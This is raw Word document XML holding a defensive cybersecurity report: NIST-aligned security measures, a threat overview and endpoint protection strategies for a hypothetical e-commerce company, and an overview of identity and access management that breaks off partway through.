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Recommended Security Measures (with NIST Principles)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Network Segmentation: Isolate the database server, payment gateway, and employee workstations into separate network segments to limit the impact of a breach. (Defense in Depth)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Intrusion Detection/Prevention System (IDS/IPS): Monitor network traffic for suspicious activity and block or alert on known attack patterns. (Defense in Depth)</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Strong Authentication: Enforce strong, unique passwords for all employee accounts and implement MFA, especially for privileged accounts. (Defense in Depth, Least Privilege)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Regular Patching: Establish a schedule for regular OS, application, and firmware patching on all endpoints. (Secure by Design)</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Endpoint Detection and Response (EDR): Deploy EDR software on employee workstations for advanced threat detection and response. (Defense in Depth)</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Data Encryption: Encrypt sensitive data at rest (database, hard drives) and in transit (HTTPS for website and payment gateway). (Defense in Depth)</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Least Privilege: Grant employees only the necessary permissions to perform their job functions. (Least Privilege)</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Separation of Duties: Ensure no single employee has complete control over critical systems or processes. (Separation of Duties)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Security Awareness Training: Educate employees about cybersecurity best practices, such as recognizing phishing emails, using strong passwords, and reporting suspicious activity. (Defense in Depth)   </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Regular Backups: Implement regular backups of critical data and store backups securely off-site. (Defense in Depth)</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Incident Response Plan: Develop and regularly test an incident response plan to ensure a swift and effective response to security incidents. (Defense in Depth)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="139"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="360" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint Protection and Threat Landscape Analysis</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Network Selection: A Mid-Sized E-commerce Company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For this task, let's focus on a mid-sized e-commerce company. This type of network typically includes various endpoints such as web servers, database servers, payment gateways, employee workstations, and mobile devices. The company's network infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> likely comprises routers, switches, firewalls, and wireless access points. They may also utilize cloud services for data storage, email, and other business applications.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This network is responsible for handling sensitive customer data, processing online transactions, and maintaining the company's online presence. As such, it faces a range of cyber threats that can disrupt operations, compromise data, and damage reputation.</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Common Threats to E-commerce Networks</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Malware:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious software designed to disrupt or damage systems. It can spread through email attachments, malicious websites, or infected software. Potential damage includes data loss, system downtime, and unauthorized access.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Phishing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deceptive attempts to trick users into revealing sensitive information, such as login credentials or financial data. This can lead to account takeovers, financial fraud, and data breaches.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SQL Injection:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> A code injection technique used to attack data-driven applications. Attackers exploit vulnerabilities in website or application code to gain unauthorized access to databases and steal or manipulate data.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Denial-of-Service (DoS) Attacks:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempts to overwhelm a network or server with traffic, making it unavailable to legitimate users. This can disrupt online operations, cause financial losses, and damage customer relationships.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Insider Threats:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious or negligent actions by employees or other trusted individuals with access to the network. This can include accidental data leakage, intentional sabotage, or misuse of privileges.</w:t>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Importance of Threat Landscape Analysis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 Threat Landscape Analysis is crucial for understanding the current cybersecurity risks faced by an organization. It involves identifying potential threats, assessing their likelihood and impact, and evaluating existing security controls. This analysis he</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">lps prioritize security efforts, allocate resources effectively, and make informed decisions about cybersecurity investments. By regularly performing a Threat Landscape Analysis, organizations can proactively address emerging threats, strengthen their secu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">rity posture, and reduce the risk of cyberattacks.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9"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="360" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint Protection Strategies</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1. Endpoint Detection and Response (EDR)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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EDR security software offers real-time threat monitoring, detection, and incident response capabilities. It goes beyond traditional antivirus by actively hunting for malicious activity, analyzing behavior patterns, and providing detailed insights into att</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">acks.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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EDR helps prevent threats such as malware, ransomware, phishing, and insider threats by:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Continuously monitoring endpoints for suspicious activity.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Blocking malicious files and processes.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Alerting security teams to potential threats.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Providing tools for investigating and remediating incidents.</w:t>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2. Strong Authentication and Access Control</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Implementing strong passwords, multi-factor authentication (MFA), and least privilege access control.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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threats such as unauthorized access, account takeovers, and insider threats by:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Making it difficult for attackers to gain access to accounts even if they have stolen passwords.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Restricting user privileges to only what is necessary for their job functions.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Limiting the potential damage that a compromised account can cause.</w:t>
        <w:br/>
        <w:br/>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3. Network Segmentation and Isolation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Dividing the network into smaller, isolated segments to limit the spread of malware and restrict access to sensitive data.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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threats such as malware propagation, lateral movement by attackers, and DoS attacks by:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Containing malware infections to a smaller portion of the network.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Making it more difficult for attackers to move laterally within the network.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Reducing the impact of DoS attacks by isolating critical systems.</w:t>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4. Regular Patching and Updates</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Keeping all software (operating systems, applications, firmware) up to date with the latest security patches.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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threats such as malware infections, ransomware attacks, and software exploits by:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Fixing known vulnerabilities that attackers could exploit.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Reducing the attack surface and making it more difficult for attackers to compromise systems.</w:t>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5. Security Awareness Training</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="48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Educating employees about cybersecurity best practices, such as recognizing phishing emails, using strong passwords, and reporting suspicious activity.  </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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threats such as phishing attacks, social engineering, and malware infections by:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Empowering employees to identify and avoid potential threats.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Promoting a security-conscious culture within the organization.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Encouraging employees to report suspicious activity promptly.</w:t>
        <w:br/>
        <w:br/>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6. Data Loss Prevention (DLP)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Implementing DLP solutions to monitor and control the movement of sensitive data within and outside the network.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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threats such as data breaches, accidental data leakage, and insider threats by:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Identifying and blocking attempts to transfer sensitive data to unauthorized locations.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Monitoring data usage and enforcing data handling policies.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Providing alerts and reports on potential data breaches.</w:t>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7. Vulnerability Scanning and Penetration Testing</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly scanning for vulnerabilities in systems and applications, and conducting penetration testing to simulate real-world attacks.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Threat Prevention:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> This strategy helps prevent a wide range of threats by:</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Identifying and addressing security weaknesses before attackers can exploit them.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Providing insights into the effectiveness of existing security controls.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Helping to prioritize security efforts and allocate resources effectively.</w:t>
        <w:b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By implementing these strategies and regularly assessing the threat landscape, organizations can significantly improve their endpoint security posture and reduce the risk of cyberattacks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:b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What is Identity and Access Management (IAM)?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Identity and Access Management (IAM) is a framework of policies and technologies for ensuring that the right people in an organization have the appropriate access to technology resources. It's a crucial part of cybersecurity, helping to manage and secure d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">igital identities.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Here's a breakdown:</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Key Components of IAM:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Identity Management:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Focuses on creating, storing, and managing digital identities. This includes:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Directory Services:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> A centralized database of users, devices, and other resources.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Identity Lifecycle Management:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Processes for creating, updating, and deleting identities (e.g., when an employee joins or leaves the company).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Access Management:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Controls which users have access to which resources. This involves:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Authentication:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verifying a user's identity (e.g., through passwords, MFA).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Authorization:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Determining what a user is allowed to do (e.g., access specific files, applications, or systems).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Access Control Policies:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rules that define who can access what.</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Why IAM Matters:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Security:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> IAM helps prevent unauthorized access to sensitive data and systems by verifying identities and enforcing access controls.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Compliance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Many regulations (e.g., GDPR, HIPAA) require organizations to have strong IAM controls in place to protect personal data.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Productivity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> IAM can streamline user access, making it easier for employees to get the resources they need to do their jobs.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Efficiency:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> IAM can automate many identity-related tasks, reducing administrative overhead and improving efficiency.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IAM Systems and Tools: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IAM systems often include tools for:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Single Sign-On (SSO):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows users to access multiple applications with one set of credentials.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Multi-Factor Authentication (MFA):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adds extra layers of security (e.g., security tokens, biometrics) to verify user identity.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Role-Based Access Control (RBAC):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assigns permissions based on a user's role in the organization.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Privileged Access Management (PAM):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
